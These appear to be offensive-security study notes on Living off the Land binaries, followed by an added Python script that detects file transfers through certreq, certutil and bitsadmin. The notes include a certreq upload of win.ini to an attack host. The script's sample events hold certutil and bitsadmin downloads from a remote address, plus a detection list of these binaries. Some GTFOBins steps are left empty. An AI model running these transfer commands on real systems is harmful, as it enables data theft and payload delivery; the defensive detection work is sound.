Living Off The Land

There are currently two websites that aggregate information on Living off the Land binaries: LOLBAS for Windows and GTFOBins for Linux.

Living off the Land binaries can be used to perform functions such as:

  • Download

  • Upload

  • Command Execution

  • File Read

  • File Write

  • Bypasses

LOLBAS (Windows)

To search for download and upload functions in LOLBAS we can use /download or /upload.

Example with CertReq.exe:

We need to listen on a port on our attack host for incoming traffic using Netcat and then execute certreq.exe to upload a file.

certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini

GTFOBins (Linux)

To search for the download and upload function in GTFOBins for Linux Binaries, we can use +file download or +file upload.

Attacker machine

Target

Download the file from the attacker with


Bitsadmin Download function

The Background Intelligent Transfer Service (BITS) can be used to download files from HTTP sites and SMB shares. It "intelligently" takes host and network utilization into account to minimize the impact on a user's foreground work.

PowerShell also enables interaction with BITS, enables file downloads and uploads, supports credentials, and can use specified proxy servers.

Certutil

Casey Smith (@subTee) found that Certutil can be used to download arbitrary files. It is available in all Windows versions and has been a popular file transfer technique, serving as a defacto wget for Windows. However, the Antimalware Scan Interface (AMSI) currently detects this as malicious Certutil usage.
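The three Windows binaries covered above (certreq.exe for upload, bitsadmin.exe and certutil.exe for download) share one detection property: a signed system binary whose command line carries a remote source (an HTTP(S)/FTP URL or a UNC path). The following script is an added example, not code from the page or from LOLBAS, that applies that rule to a handful of constructed Sysmon-style process-creation records. The record fields, the sample command lines (except the certreq line, which is the one shown above) and the 203.0.113.10 address are all made up for the illustration; the benign certutil -hashfile and certreq -new invocations are included to show that the rule keys on the remote source, not on the binary name alone.

```python
import re

# System binaries this page describes as file-transfer LOLBins.
LOLBIN_TRANSFER_BINARIES = {"certreq.exe", "certutil.exe", "bitsadmin.exe"}

# Remote-source indicators: an HTTP(S)/FTP URL or a UNC path anywhere in the command line.
REMOTE_SOURCE_RE = re.compile(r"(?i)(?:https?|ftp)://\S+|\\\\[^\\\s]+\\\S+")

# Constructed sample process-creation events (Sysmon Event ID 1 fields); not real telemetry.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certreq.exe",
     "CommandLine": r"certreq.exe -Post -config http://192.168.49.128:8000/ c:\windows\win.ini",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",  # benign: local hashing, no remote source
     "CommandLine": r"certutil.exe -hashfile C:\Users\alice\setup.msi SHA256",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\bitsadmin.exe",
     "CommandLine": r"bitsadmin.exe /transfer job1 /download /priority normal "
                    r"http://203.0.113.10/update.bin C:\Users\Public\update.bin",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/tool.txt C:\Users\Public\tool.txt",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"Image": r"C:\Windows\System32\certreq.exe",  # benign: local certificate request, no remote source
     "CommandLine": r"certreq.exe -new C:\certs\request.inf C:\certs\request.req",
     "ParentImage": r"C:\Windows\System32\mmc.exe"},
]


def image_name(path):
    """Return the lower-cased file name of a Windows image path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify_event(event):
    """Return a finding dict when the event looks like LOLBin file transfer, else None."""
    name = image_name(event["Image"])
    if name not in LOLBIN_TRANSFER_BINARIES:
        return None
    cmd = event["CommandLine"]
    match = REMOTE_SOURCE_RE.search(cmd)
    if not match:
        return None  # local-only usage of the binary; not a transfer
    remote = match.group(0)
    reasons = [f"{name} invoked with remote source {remote}"]
    # certreq uploads when -Post is present; the other two are download-only in this rule.
    direction = "download"
    if name == "certreq.exe" and re.search(r"(?i)(?:^|\s)-post\b", cmd):
        direction = "upload"
    if name == "certutil.exe":
        reasons.append("certutil download usage is also flagged by AMSI; correlate with AV/AMSI alerts")
    return {
        "image": name,
        "direction": direction,
        "remote": remote,
        "parent": image_name(event["ParentImage"]),
        "reasons": reasons,
    }


def scan_events(events):
    """Run classify_event over a list of events and return the findings with their indexes."""
    findings = []
    for idx, event in enumerate(events):
        finding = classify_event(event)
        if finding is not None:
            finding["index"] = idx
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_events(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['image']} {f['direction']} via {f['remote']} "
              f"(parent {f['parent']}); " + "; ".join(f["reasons"]))
```

Run as-is, the script reports the certreq upload, the bitsadmin download and the certutil download and stays silent on the two benign invocations. In a real pipeline the same rule would sit on top of Sysmon or EDR process-creation telemetry, and the parent-process field is what you would use to separate scripted or shell-launched transfers from administrative tooling.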
